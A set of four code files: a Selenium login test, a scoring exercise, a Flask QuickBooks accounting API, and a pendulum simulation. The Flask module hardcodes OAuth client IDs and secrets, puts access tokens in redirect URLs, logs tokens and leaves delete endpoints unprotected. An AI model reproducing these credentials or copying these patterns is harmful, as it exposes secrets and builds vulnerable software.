+{"seq_id":"169304815","text":"# -*- coding: utf-8 -*-\n# @Author : chenky\n# @ProjectName :xiaMenWeb\n# @FileName: test_carried_manage.py\n# @Software: PyCharm\n\n\nimport unittest\nfrom selenium import webdriver\nimport time\nfrom pageObject.carriedManagePage import SystemManagePage\n\n\nclass TestCarriedManage(unittest.TestCase):\n @classmethod\n def tearDownClass(cls):\n super().tearDownClass()\n cls.driver.quit()\n\n def tearDown(self):\n super().tearDown()\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.driver = webdriver.Firefox()\n cls.carried_page = SystemManagePage(cls.driver)\n cls.driver.get(\"http://62.234.35.213:8080/cx/\")\n cls.carried_page.login_to_system_manage()\n\n def setUp(self):\n super().setUp()\n self.driver.get(\"http://62.234.35.213:8080/cx/\")\n\n def test_01(self):\n \"\"\"验证能正确添加承运人流程\"\"\"\n carried_name = str(round(time.time()))\n self.carried_page.click_system_manage()\n self.carried_page.click_carried_manage()\n self.carried_page.click_add_carried()\n self.carried_page.input_carried_name(carried_name)\n self.carried_page.input_carried_english_name(carried_name)\n self.carried_page.click_sure()\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"testcase/test_carried_manage.py","file_name":"test_carried_manage.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"125714929","text":"instances = int(input())\nscores=[]\nupperLimits=[]\nlowerLimits=[]\narr_num_candidates=[]\nresultval=[]\nresultarray=[]\nvariablelist=[]\n\nfor i in range(instances):\n x=int(input())\n scores.append(x)\n \nqueries_low =int(input())\n\nfor i in range(queries_low):\n y=int(input()) \n lowerLimits.append(y)\n \nqueries_up =int(input())\n\nfor i in range(queries_up):\n z=int(input())\n upperLimits.append(z)\n \ndef jobOffers(scores,lowerLimits,upperLimits):\n for n_queries in range(len(upperLimits)):\n for i_candidate in range(len(scores)):\n if lowerLimits[n_queries]<=scores[i_candidate]<=upperLimits[n_queries]:\n arr_num_candidates.append(scores[i_candidate]) \n variablelist.append(arr_num_candidates)\n print(variablelist)\n res=len(arr_num_candidates) \n resultarray.append(res) \n del arr_num_candidates[:] \n return resultarray\n\nresultval = jobOffers(scores,lowerLimits,upperLimits)\n\nprint(resultval)","sub_path":"hackerrankproblems/TestCandidate.py","file_name":"TestCandidate.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"293891399","text":"import urllib\nimport json\nimport requests\nimport random\nimport base64\nimport os\nimport json\n\nfrom flask import Blueprint, jsonify, request, render_template, redirect, session\nfrom flask_restplus import Namespace, Resource, reqparse, fields\n\nfrom project.api.models import Token, User, Document, Cash_Flow, Balance_Sheet, Profit_Loss\nfrom project import db\n\n'''\nREDIRECT_URI = os.getenv('REDIRECT_URI')\nACCOUNTING_SCOPE = 'com.intuit.quickbooks.accounting'\nCLIENT_ID = 'Q0LH8ItSo4cZCuka8OAiXdbdea5k5vzWRaytOSeplNroZ4jYQi'\nCLIENT_SECRET = 'E5FYXGrL85Xm0UqkqXntZQIMlU3hlP6fhvoUEJQ4'\nSANDBOX_QBO_BASEURL = 'https://sandbox-quickbooks.api.intuit.com'\n'''\n\nREDIRECT_URI = 'http://ec2-54-175-153-92.compute-1.amazonaws.com:5000/accounting/authCodeHandler'\nACCOUNTING_SCOPE = 'com.intuit.quickbooks.accounting'\nCLIENT_ID = 'Q0qlHtvrfP8gWXQQ0y7mY9JqIaya8t3IKPkaXo5VR3GcJjKFZZ'\nCLIENT_SECRET = 'lFMCrPlH6QKirroDcTbynvZlh9J42s8Fnzc5ALiF'\nSANDBOX_QBO_BASEURL = 'https://sandbox-quickbooks.api.intuit.com'\n\n\napi = Namespace('accounting', description='Connect and Get Accounting Data')\n\nreport_fields = api.model('Report', {\n 'report_type': fields.String(description=\"Type of report among balance_sheet, income, cash_flow\", required=True) , \n 'report_id': fields.String(description=\"Id of the specific accounting Report\", required=True)\n})\n\ndocument_fields = api.model('Document', {\n 'uid':fields.String(description=\"User UID\", required=True),\n 'name':fields.String(description=\"Document Name\", required=True),\n 'link':fields.String(description=\"Document Name\", required=True)\n})\n\ncompany_reports = api.model('Reports', {\n 'user_id':fields.String(description=\"User ID\", required=True)\n})\n\n## Switching to Company UID later\n\ncompany_fields = api.model('Company', {\n 'uid':fields.String(description=\"User UID\", required=True),\n 'realmId': fields.String(description=\"Realm Id\", required=True),\n 'access_token': fields.String(description=\"Access Token\", required=True)\n})\n\ndef getRandomString(length, allowed_chars='abcdefghijklmnopqrstuvwxyz' 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'):\n return ''.join(random.choice(allowed_chars) for i in range(length))\n\ndef stringToBase64(s):\n return base64.b64encode(bytes(s, 'utf-8')).decode()\n\ndef getSecretKey():\n chars = 'abcdefghijklmnopqrstuvwxyz0123456789'\n return getRandomString(40, chars)\n\ndef get_CSRF_token(request):\n parser = reqparse.RequestParser()\n parser.add_argument('token', type=str)\n data = parser.parse_args()\n print(request.json)\n token = request.json\n if token is None:\n token = getSecretKey()\n data['csrfToken'] = token\n return token\n\ndef getDiscoveryDocument():\n r = requests.get('https://developer.api.intuit.com/.well-known/openid_sandbox_configuration/')\n if r.status_code >= 400:\n return ''\n discovery_doc_json = r.json()\n discovery_doc = OAuth2Config(\n issuer=discovery_doc_json['issuer'],\n auth_endpoint=discovery_doc_json['authorization_endpoint'],\n userinfo_endpoint=discovery_doc_json['userinfo_endpoint'],\n revoke_endpoint=discovery_doc_json['revocation_endpoint'],\n token_endpoint=discovery_doc_json['token_endpoint'],\n jwks_uri=discovery_doc_json['jwks_uri'])\n return discovery_doc_json\n\n\n@api.route('/uploadDocuments')\nclass Upload(Resource):\n @api.expect(document_fields)\n def post(self):\n data = request.get_json()\n uid = data['uid']\n document_name = data['name']\n document_link = data['link']\n user = 
User.query.filter_by(uid=data['uid']).first()\n document = Document(user=user,name=document_name, link=document_link)\n db.session.add(document)\n db.session.commit()\n response_object = jsonify({\n 'status':'success',\n 'data': {\n 'user':uid,\n 'document name':document_name,\n 'document link': document_link\n }\n })\n return response_object\n\n\n# Get documents\n@api.route('/documents/')\nclass Documents(Resource):\n def get(self, uid):\n user = User.query.filter_by(uid=uid).first()\n documents = Document.query.filter_by(user_id=user.id)\n response_data = []\n for document in documents:\n response_data.append({\n \"id\":document.id,\n \"user_id\":document.user_id,\n \"name\":document.name,\n \"link\":document.link\n })\n response = jsonify(response_data)\n return response\n\n\n# Delete Account\n@api.route('/documents/')\nclass DeleteDocument(Resource):\n def delete(self, id):\n document = Document.query.get(id)\n db.session.delete(document)\n try:\n db.session.commit()\n \n response = jsonify({\n 'status':'success',\n 'message':'Successfully deleted document'\n })\n return response\n except:\n db.session.rollback()\n raise\n response = jsonify({\n 'status':'fail',\n 'message':'Document does not exist'\n })\n\n\n# @api.route('/recon')\n# class Recon(Resource):\n# def get(self):\n# discoveryDocument = getDiscoveryDocument()\n# response_object = jsonify({\n# 'status':'success',\n# 'data':discoveryDocument\n# })\n# return response_object\n\n@api.route('/connectToQuickbooks')\nclass Connecting(Resource):\n def get(self):\n url = 'https://appcenter.intuit.com/connect/oauth2'\n params = {\n 'scope': ACCOUNTING_SCOPE,\n 'redirect_uri': REDIRECT_URI,\n 'response_type': 'code', \n 'state': get_CSRF_token(request), \n 'client_id': CLIENT_ID\n }\n url += '?' + urllib.parse.urlencode(params)\n response_object = jsonify({\n 'status':'success',\n 'message': 'Successfully connecting to Quickbooks',\n 'data': url\n })\n response_object.status_code = 200\n return response_object\n\n@api.route('/authCodeHandler')\nclass Authorization(Resource):\n def get(self):\n \"\"\" Authorization Code Handler \"\"\"\n parser = reqparse.RequestParser()\n parser.add_argument('state', type=str)\n parser.add_argument('code', type=str)\n parser.add_argument('realmId', type=str)\n data = parser.parse_args()\n print(\"Auth Code are:%s\"%data['code'])\n auth_code = data['code']\n realmId = data['realmId']\n token_endpoint = 'https://oauth.platform.intuit.com/oauth2/v1/tokens/bearer'\n auth_header = 'Basic ' + stringToBase64(CLIENT_ID + ':' + CLIENT_SECRET)\n headers = {'Accept': 'application/json', 'content-type': 'application/x-www-form-urlencoded',\n 'Authorization': auth_header}\n payload = {\n 'grant_type': 'authorization_code',\n 'code': auth_code,\n 'redirect_uri': REDIRECT_URI\n }\n print(payload)\n r = requests.post(token_endpoint, data=payload, headers=headers)\n data = json.loads(r.text)\n print(\"OUR TOKEN RESPONSE ARE: %s\"%(data))\n if r.status_code == 400:\n response_object = jsonify({\n 'status':'fail',\n 'messsage': 'Not getting access code',\n 'data': data\n })\n else:\n response_object = jsonify({\n 'status':'success',\n 'message': 'Successfully receive and save code',\n 'data': {\n 'refresh_token_expires_in':data['x_refresh_token_expires_in'],\n 'refresh_token':data['refresh_token'],\n 'access_token':data['access_token'],\n 'token_type':data['token_type'],\n 'expires_in':data['expires_in'],\n 'realmId':realmId\n }\n })\n print(\"ACCOUNTING: %s\"%(response_object.data))\n access_token = data['access_token']\n 
return redirect('http://ec2-54-172-36-185.compute-1.amazonaws.com/quickbooks?status=success&message=ok&access_token=%s&realmId=%s'%(access_token, realmId),code=302)\n\n@api.route('/apiCall/companyInfo')\nclass companyInfo(Resource):\n @api.expect(company_fields)\n def post(self):\n \"\"\" Making a specific API call \"\"\"\n data = request.get_json()\n print(data['realmId'], data['access_token'], data['uid'])\n user = User.query.filter_by(uid=data['uid']).first()\n user.quickbook_access_token = data['access_token']\n user.quickbook_id = data['realmId']\n db.session.add(user)\n db.session.commit()\n route = 'https://sandbox-quickbooks.api.intuit.com/v3/company/{0}/companyinfo/{0}'.format(data['realmId'])\n print(route)\n auth_header = 'Bearer ' + data['access_token']\n headers = {'Authorization': auth_header, 'accept': 'application/json'}\n r = requests.get(route, headers=headers)\n print(\"COMPANY RESPONSE: %s\"%(r.text))\n status_code = r.status_code\n if status_code != 200:\n response = ''\n return response, status_code\n response = json.loads(r.text)\n return response, status_code\n\n## Balance Sheet\n@api.route('/apiCall/BalanceSheet')\nclass BalanceSheet(Resource):\n @api.expect(company_fields)\n def post(self):\n \"\"\" Making a specific API call \"\"\"\n data = request.get_json()\n print('BALANCE SHEET---------------')\n print(data)\n print(data['realmId'], data['access_token'])\n route = 'https://sandbox-quickbooks.api.intuit.com/v3/company/{0}/reports/BalanceSheet?minorversion=4'.format(data['realmId'])\n print(route)\n auth_header = 'Bearer ' + data['access_token']\n headers = {'Authorization': auth_header, 'accept': 'application/json'}\n r = requests.get(route, headers=headers)\n print(\"COMPANY RESPONSE: %s\"%(r.text))\n status_code = r.status_code\n if status_code != 200:\n response = ''\n return response, status_code\n response = json.loads(r.text)\n\n user = User.query.filter_by(uid=data['uid']).first()\n report_name = response['Header']['ReportName']\n startPeriod = response['Header']['StartPeriod']\n endPeriod = response['Header']['EndPeriod']\n current_asset = response['Rows']['Row'][0]['Rows']['Row'][0]['Summary']['ColData'][1]['value']\n fixed_asset = response['Rows']['Row'][0]['Rows']['Row'][1]['Summary']['ColData'][1]['value']\n current_liability = response['Rows']['Row'][1]['Rows']['Row'][0]['Rows']['Row'][0]['Summary']['ColData'][1]['value']\n longterm_liability = response['Rows']['Row'][1]['Rows']['Row'][0]['Rows']['Row'][0]['Summary']['ColData'][1]['value']\n equity = response['Rows']['Row'][1]['Rows']['Row'][1]['Summary']['ColData'][1]['value']\n\n balance_sheet_report = Balance_Sheet(\n user = user,\n report_name = report_name,\n startPeriod = startPeriod,\n endPeriod = endPeriod,\n current_asset = current_asset,\n fixed_asset = fixed_asset,\n current_liability = current_liability,\n longterm_liability = longterm_liability,\n equity = equity\n )\n\n db.session.add(balance_sheet_report)\n db.session.commit()\n response_object = jsonify({\n 'account': data['realmId'],\n 'report_name': report_name,\n 'startPeriod': startPeriod,\n 'endPeriod':endPeriod,\n 'current_asset': current_asset,\n 'fixed_asset':fixed_asset,\n 'current_liability':current_liability,\n 'longterm_liability':longterm_liability,\n 'equity': equity\n })\n response_object.status_code = 200\n return response_object\n\n\n## Cash Flow \n@api.route('/apiCall/CashFlow')\nclass CashFlow(Resource):\n @api.expect(company_fields)\n def post(self):\n \"\"\" Making a specific API call \"\"\"\n data = 
request.get_json()\n print(data['realmId'], data['access_token'])\n route = 'https://sandbox-quickbooks.api.intuit.com/v3/company/{0}/reports/CashFlow?minorversion=4'.format(data['realmId'])\n print(route)\n auth_header = 'Bearer ' + data['access_token']\n headers = {'Authorization': auth_header, 'accept': 'application/json'}\n r = requests.get(route, headers=headers)\n print(\"COMPANY RESPONSE: %s\"%(r.text))\n status_code = r.status_code\n if status_code != 200:\n response = ''\n return response, status_code\n response = json.loads(r.text)\n\n user = User.query.filter_by(uid=data['uid']).first()\n report_name = response['Header']['ReportName']\n startPeriod = response['Header']['StartPeriod']\n endPeriod = response['Header']['EndPeriod']\n beginningCash = response['Rows']['Row'][4]['ColData'][1]['value']\n endingCash = response['Rows']['Row'][5]['Summary']['ColData'][1]['value']\n operatingNetCash = response['Rows']['Row'][0]['Summary']['ColData'][1]['value']\n investingNetCash = response['Rows']['Row'][1]['Summary']['ColData'][1]['value']\n financingNetCash = response['Rows']['Row'][2]['Summary']['ColData'][1]['value']\n print(\"INSERTING TO DATABASES\")\n cashFlowReport = Cash_Flow(\n user=user,\n report_name=report_name, \n startPeriod=startPeriod, \n endPeriod=endPeriod, \n beginningCash=beginningCash, \n endingCash=endingCash,\n operatingNetCash=operatingNetCash,\n investingNetCash=investingNetCash,\n financingNetCash=financingNetCash\n )\n db.session.add(cashFlowReport)\n db.session.commit()\n response_object = jsonify({\n 'report_name':report_name,\n 'startPeriod':startPeriod,\n 'endPeriod':endPeriod,\n 'beginningCash':beginningCash, \n 'endingCash':endingCash,\n 'operatingNetCash':operatingNetCash,\n 'investingNetCash':investingNetCash,\n 'financingNetCash':financingNetCash\n })\n response_object.status_code = 200\n return response_object\n\n## Profit and Los\n@api.route('/apiCall/ProfitAndLoss')\nclass ProfitAndLoss(Resource):\n @api.expect(company_fields)\n def post(self):\n \"\"\" Making a specific API call \"\"\"\n data = request.get_json()\n print(data)\n print(data['realmId'], data['access_token'], data['uid'])\n route = 'https://sandbox-quickbooks.api.intuit.com/v3/company/{0}/reports/ProfitAndLoss?minorversion=4'.format(data['realmId'])\n print(route)\n auth_header = 'Bearer ' + data['access_token']\n headers = {'Authorization': auth_header, 'accept': 'application/json'}\n r = requests.get(route, headers=headers)\n print(\"COMPANY RESPONSE: %s\"%(r.text))\n status_code = r.status_code\n if status_code != 200:\n response = ''\n return response, status_code\n response = json.loads(r.text)\n\n\n\n user = User.query.filter_by(uid=data['uid']).first()\n report_name = response['Header']['ReportName']\n startPeriod = response['Header']['StartPeriod']\n endPeriod = response['Header']['EndPeriod']\n income = response['Rows']['Row'][0]['Summary']['ColData'][1]['value']\n COGS = response['Rows']['Row'][1]['Summary']['ColData'][1]['value']\n grossProfit = response['Rows']['Row'][2]['Summary']['ColData'][1]['value']\n expenses = response['Rows']['Row'][3]['Summary']['ColData'][1]['value']\n netOperatingIncome = response['Rows']['Row'][4]['Summary']['ColData'][1]['value']\n otherExpenses = response['Rows']['Row'][5]['Summary']['ColData'][1]['value']\n netOtherIncome = response['Rows']['Row'][6]['Summary']['ColData'][1]['value']\n netIncome = response['Rows']['Row'][7]['Summary']['ColData'][1]['value']\n\n\n profit_loss_report = Profit_Loss(\n user = user,\n report_name = report_name,\n 
startPeriod = startPeriod,\n endPeriod = endPeriod,\n income = income,\n COGS = COGS,\n grossProfit = grossProfit,\n expenses = expenses,\n netOperatingIncome = netOperatingIncome,\n otherExpenses = otherExpenses,\n netOtherIncome = netOtherIncome,\n netIncome = netIncome\n )\n db.session.add(profit_loss_report)\n db.session.commit()\n \n response_object = jsonify({\n 'user uid': data['uid'],\n 'report_name':report_name,\n 'startPeriod':startPeriod,\n 'endPeriod':endPeriod,\n 'income' : income,\n 'COGS': COGS,\n 'grossProfit' :grossProfit,\n 'expenses':expenses,\n 'netOperatingIncome': netOperatingIncome,\n 'otherExpenses':otherExpenses,\n 'netOtherIncome':netOtherIncome,\n 'netIncome':netIncome\n })\n response_object.status_code = 200\n return response_object\n\n@api.route('/accountingReport')\nclass AllReport(Resource):\n @api.expect(company_reports)\n def post(self):\n \"\"\"Get Request to Display All Accounting Reports Belong to An User\"\"\"\n data = request.get_json()\n print(\"HERE IS THE REQUEST CONTENT\")\n print(data)\n uid = data['user_id']\n\n ## Pulling newest reports from Quickbook\n our_user = User.query.filter_by(uid=uid).first()\n user_id = our_user.id\n access_token = our_user.quickbook_access_token\n realmId = our_user.quickbook_id\n\n ## \n def pull_quickbook_report(report_name,uid,access_token, realmId):\n route = 'http://ec2-54-175-153-92.compute-1.amazonaws.com:5000/accounting/apiCall/'+report_name\n r = requests.post(route, data={'uid':uid, 'realmId':realmId, 'access_token':access_token}) \n\n ## Pulling Three Reports from QuickBook and Insert into DB\n pull_quickbook_report('BalanceSheet', uid, access_token, realmId)\n pull_quickbook_report('CashFlow', uid, access_token, realmId)\n pull_quickbook_report('ProfitAndLoss', uid, access_token, realmId)\n\n ## Query to DB\n balance_sheet = Balance_Sheet.query.filter_by(user_id=user_id).first()\n cash_flow = Cash_Flow.query.filter_by(user_id=user_id).first()\n profit_loss = Profit_Loss.query.filter_by(user_id=user_id).first()\n\n print('BEFORE RESPONSE----')\n response = jsonify([])\n if balance_sheet:\n response = jsonify([\n {\n \"report_name\":balance_sheet.report_name, \n \"start_date\":balance_sheet.startPeriod, \n \"account\":balance_sheet.id\n }\n ])\n print('RESPONSE-------')\n print(response)\n\n return response\n\n@api.route('/deleteReport')\nclass deleteReport(Resource):\n @api.expect(report_fields)\n def delete(self):\n \"\"\"Post Request to Delete Report by Type & ID\"\"\"\n\n ## Parsing data from Request\n data = request.get_json()\n account_type = data['report_type']\n report_id = int(data['report_id'])\n user_pick = \"Not pick yet\"\n\n # Delete from DB \n def delete_report(report_object):\n if report_object:\n db.session.delete(report_object)\n try:\n db.session.commit()\n print(\"Deleted from db\")\n except:\n db.session.rollback()\n raise\n response = jsonify({\n 'status':'success', \n 'message': 'Successfully delete accounting report'\n })\n response.status_code = 200\n return response\n else:\n response = jsonify({\n 'status':'fail',\n 'message': 'Fail to delete the report',\n 'status_code': 401\n })\n return response\n\n # ## Decide Which Type of Report to Delete\n if account_type == \"balance_sheet\":\n balance_sheet_report = Balance_Sheet.query.filter_by(id=report_id).first()\n return delete_report(balance_sheet_report)\n\n elif account_type == \"income\":\n income_report = Profit_Loss.query.filter_by(id=report_id).first()\n return delete_report(income_report)\n\n elif account_type == 
\"cashflow\":\n cash_flow = Cash_Flow.query.filter_by(id=report_id).first()\n return delete_report(cash_flow)\n \n else:\n user_pick = \"Not correct report type please pick one from balance_sheet, cashflow, income\" \n\n# @api.route('/connected')\n# class Connected(Resource):\n# pass\n\n# @api.route('/disconnect')\n# class Disconnect(Resource):\n# def get(self):\n# \"\"\" Disconnect from Quick Book Online \"\"\"\n# return \"Disconnected from Quickbook\", 200\n\n# @api.route('/refreshTokenCall')\n# class refreshToken(Resource):\n# def get(self):\n# \"\"\" Refresh Access Token \"\"\"\n# return \"Refreshing access token\", 200\n\n\n\n\n\n\n\n\n\n","sub_path":"project/api/accounting.py","file_name":"accounting.py","file_ext":"py","file_size_in_byte":21429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"150630342","text":"from numpy import array, zeros, eye, asarray, dot, rad2deg, deg2rad, linspace, sin, cos, pi\nfrom matplotlib.pyplot import plot, xlabel, ylabel, legend, rcParams\nfrom sympy import symbols\nfrom sympy.physics.mechanics import dynamicsymbols, ReferenceFrame, Point, inertia, RigidBody, KanesMethod\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import odeint\nfrom pydy.codegen.code import generate_ode_function\nimport matplotlib.animation as animation\n#from utils import controllable\n\n#Sets up inertial frame as well as frames for each linkage\ninertial_frame = ReferenceFrame('I')\nr_leg_frame = ReferenceFrame('R')\nbody_frame = ReferenceFrame('B')\nl_leg_frame = ReferenceFrame('L')\n\n#Sets up symbols for joint angles\ntheta1, theta2, theta3 = dynamicsymbols('theta1, theta2, theta3')\n\n#Orients the left leg frame to the inertial frame by angle theta1\n#and the body frame to to the leg frame by angle theta2\n#and the right leg frame to the body frame by theta3\nl_leg_frame.orient(inertial_frame, 'Axis', (theta1, inertial_frame.z))\nbody_frame.orient(l_leg_frame, 'Axis', (theta2, l_leg_frame.z))\nr_leg_frame.orient(body_frame, 'Axis', (theta3, body_frame.z))\n\n#Sets up points for the joints and places them relative to each other\nl_ankle = Point('LA')\nl_leg_length = symbols('l_L')\nl_hip = Point('LH')\nl_hip.set_pos(l_ankle, l_leg_length*l_leg_frame.y)\nhip_width = symbols('h_W')\nr_hip = Point('RH')\nr_hip.set_pos(l_hip, hip_width*body_frame.y)\n\n#Sets up the centers of mass of each of the linkages\nr_leg_com_length, body_com_length, l_leg_com_length = symbols('d_RL, d_B, d_LL')\nl_leg_mass_center = Point('LL_o')\nl_leg_mass_center.set_pos(l_ankle, l_leg_com_length*l_leg_frame.y)\nbody_mass_center = Point('B_o')\nbody_mass_center.set_pos(l_hip, body_com_length*body_frame.y)\nr_leg_mass_center = Point('RL_o')\nr_leg_mass_center.set_pos(r_hip, l_leg_com_length*r_leg_frame.y)\n\n#Sets up the angular velocities\nomega1, omega2, omega3 = dynamicsymbols('omega1, omega2, omega3')\n#Relates angular velocity values to the angular positions theta1 and theta2\nkinematic_differential_equations = [omega1 - theta1.diff(),\n omega2 - theta2.diff(),\n omega3 - theta3.diff()]\n\n#Sets up the rotational axes of the angular velocities\nl_leg_frame.set_ang_vel(inertial_frame, omega1*inertial_frame.z)\nl_leg_frame.ang_vel_in(inertial_frame)\nbody_frame.set_ang_vel(l_leg_frame, omega2*inertial_frame.z)\nbody_frame.ang_vel_in(inertial_frame)\nr_leg_frame.set_ang_vel(body_frame, omega3*inertial_frame.z)\nr_leg_frame.ang_vel_in(inertial_frame)\n\n#Sets up the linear velocities of the points on the linkages\nl_ankle.set_vel(inertial_frame, 0)\nl_leg_mass_center.v2pt_theory(l_ankle, inertial_frame, l_leg_frame)\nl_leg_mass_center.vel(inertial_frame)\nl_hip.v2pt_theory(l_ankle, inertial_frame, l_leg_frame)\nl_hip.vel(inertial_frame)\nbody_mass_center.v2pt_theory(l_hip, inertial_frame, body_frame)\nbody_mass_center.vel(inertial_frame)\nr_hip.v2pt_theory(l_hip, inertial_frame, body_frame)\nr_hip.vel(inertial_frame)\nr_leg_mass_center.v2pt_theory(r_hip, inertial_frame, r_leg_frame)\nr_leg_mass_center.vel(inertial_frame)\n\n#Sets up the masses of the linkages\nl_leg_mass, body_mass, r_leg_mass = symbols('m_LL, m_B, m_RL')\n\n#Sets up the rotational inertia of the linkages\nl_leg_inertia, body_inertia, r_leg_inertia = symbols('I_LLz, I_Bz, I_RLz')\n\n#Sets up inertia dyadics\nl_leg_inertia_dyadic = inertia(l_leg_frame, 0, 0, l_leg_inertia)\nl_leg_central_inertia 
= (l_leg_inertia_dyadic, l_leg_mass_center)\n\nbody_inertia_dyadic = inertia(body_frame, 0, 0, body_inertia)\nbody_central_inertia = (body_inertia_dyadic, body_mass_center)\n\nr_leg_inertia_dyadic = inertia(r_leg_frame, 0, 0, r_leg_inertia)\nr_leg_central_inertia = (r_leg_inertia_dyadic, r_leg_mass_center)\n\n#Defines the linkages as rigid bodies\nl_leg = RigidBody('Left Leg', l_leg_mass_center, l_leg_frame, l_leg_mass, l_leg_central_inertia)\nbody = RigidBody('Body', body_mass_center, body_frame, body_mass, body_central_inertia)\nr_leg = RigidBody('Right Leg', r_leg_mass_center, r_leg_frame, r_leg_mass, r_leg_central_inertia)\n\n#Sets up gravity information and assigns gravity to act on mass centers\ng = symbols('g')\nl_leg_grav_force_vector = -l_leg_mass*g*inertial_frame.y\nl_leg_grav_force = (l_leg_mass_center, l_leg_grav_force_vector)\nbody_grav_force_vector = -body_mass*g*inertial_frame.y\nbody_grav_force = (body_mass_center,body_grav_force_vector)\nr_leg_grav_force_vector = -r_leg_mass*g*inertial_frame.y\nr_leg_grav_force = (r_leg_mass_center, r_leg_grav_force_vector)\n\n#Sets up joint torques\nl_ankle_torque, l_hip_torque, r_hip_torque = dynamicsymbols('T_la, T_lh, T_rh')\nl_ankle_torque_vector = l_ankle_torque*inertial_frame.z - l_hip_torque*inertial_frame.z\nl_ankle_torque = (l_leg_frame, l_ankle_torque_vector)\n\nl_hip_torque_vector = l_hip_torque*inertial_frame.z - r_hip_torque*inertial_frame.z\nl_hip_torque = (body_frame, l_hip_torque_vector)\n\nr_hip_torque_vector = r_hip_torque*inertial_frame.z\nr_hip_torque = (r_leg_frame, r_hip_torque_vector)\n\n#Generalized coordinates\ncoordinates = [theta1, theta2, theta3]\n\n#Generalized speeds\nspeeds = [omega1, omega2, omega3]\n\n#Create a KanesMethod object\nkane = KanesMethod(inertial_frame, coordinates, speeds, kinematic_differential_equations)\n\nloads = [l_leg_grav_force,\n body_grav_force,\n r_leg_grav_force,\n l_ankle_torque,\n l_hip_torque,\n r_hip_torque]\nbodies = [l_leg, body, r_leg]\n\nfr, frstar = kane.kanes_equations(loads, bodies)\n\nmass_matrix = kane.mass_matrix_full\n\nforcing_vector = kane.forcing_full\n\nrcParams['figure.figsize'] = (14.0, 6.0)\n\nconstants = [l_leg_length,\n l_leg_com_length,\n l_leg_mass,\n l_leg_inertia,\n hip_width,\n body_com_length,\n body_mass,\n body_inertia,\n r_leg_com_length,\n r_leg_mass,\n r_leg_inertia,\n g]\n\ncoordinates = [theta1, theta2, theta3]\n\nspeeds = [omega1, omega2, omega3]\n\n#Specified contains the matrix for the input torques\nspecified = [l_ankle_torque, l_hip_torque, r_hip_torque]\n\nright_hand_side = generate_ode_function(mass_matrix, forcing_vector,\n constants,\n coordinates, speeds, specified)\n\n#Initial Conditions for speeds and positions\nx0 = zeros(6)\n#x0[:3] = deg2rad(2.0)\n\n#Specifies numerical constants for inertial/mass properties\nnumerical_constants = array([0.611, # l_leg_length[m]\n 0.387, # l_leg_com_length[m]\n 6.769, # l_leg_mass[kg]\n 0.101, # l_leg_inertia [kg*m^2]\n 0.424, # hip_width [m]\n 0.193, # body_com_length [m]\n 17.01, # body_mass[kg]\n 0.282, # body_inertia [kg*m^2]\n 0.305, # r_leg_com_length [m]\n 32.44, # r_leg_mass [kg]\n 1.485, # r_leg_inertia [kg*m^2]\n 9.81], # acceleration due to gravity [m/s^2]\n )\n#Set input torques to 0\nnumerical_specified = zeros(3)\n\nargs = {'constants': numerical_constants,\n 'specified': numerical_specified}\n\nframes_per_sec = 60\nfinal_time = 5.0\n\nt = linspace(0.0, final_time, final_time*frames_per_sec)\n\nright_hand_side(x0, 0.0, args)\n\ny = odeint(right_hand_side, x0, t, args=(args,))\n\nLA_x 
= numerical_constants[0]*sin(y[:,0])\nLA_y = numerical_constants[0]*cos(y[:,0])\n\nRH_x = LA_x + numerical_constants[4]*sin(y[:,1])\nRH_y = LA_y + numerical_constants[4]*cos(y[:,1])\n\nRA_x = RH_x + numerical_constants[7]*2*sin(y[:,2])\nRA_y = RH_y + numerical_constants[7]*2*cos(y[:,2])\n\ndt = 1.0/frames_per_sec\n\nfig = plt.figure()\nax = fig.add_subplot(111, autoscale_on=False,aspect='equal', xlim = (-2, 2), ylim = (-2, 2))\nax.grid()\n\nline, = ax.plot([], [], 'o-', lw=2)\ntime_template = 'time=%.1fs'\ntime_text = ax.text(0.05, 0.9, '', transform=ax.transAxes)\n\ndef init():\n line.set_data([],[])\n time_text.set_text('')\n return line, time_text\n\ndef animate(i):\n thisx = [0, LA_x[i], RH_x[i], RA_x[i]]\n thisy = [0, LA_y[i], RH_y[i], RA_y[i]]\n\n line.set_data(thisx, thisy)\n time_text.set_text(time_template%(i*dt))\n return line, time_text\n\nani = animation.FuncAnimation(fig, animate, np.arange(1, len(y)), interval=25, blit=True, init_func=init)\n#ani.save('double_pendulum.mp4')\nplt.show()\n\n#plot(t, rad2deg(y[:,:3]))\n#xlabel('Time [s]')\n#ylabel('Angle[deg]')\n#legend([\"${}$\".format(vlatex(c)) for c in coordinates])\n#plt.show()\n\n#plot(t, rad2deg(y[:, 3:]))\n#xlabel('Time [s]')\n#ylabel('Angular Rate [deg/s]')\n#legend([\"${}$\".format(vlatex(s)) for s in speeds])\n#plt.show()\n","sub_path":"Triple_pendulum/triple_pendulum.py","file_name":"triple_pendulum.py","file_ext":"py","file_size_in_byte":8838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
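The args=(args,) wrapping in the record above is easy to misread: scipy's odeint forwards each element of its args tuple positionally after (x, t), and the pydy-generated right_hand_side takes the constants/specified dict as that single extra argument. A minimal stand-in with the same calling convention (the dynamics are a placeholder, not the pendulum's):

from scipy.integrate import odeint
import numpy as np

def rhs(x, t, extra):
    # same (state, time, extras-dict) signature as the generated function
    k = extra['constants']
    return -k * x  # placeholder dynamics, decays toward zero

x0 = np.ones(2)
t = np.linspace(0.0, 1.0, 10)
y = odeint(rhs, x0, t, args=({'constants': 0.5},))  # note the 1-tuple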
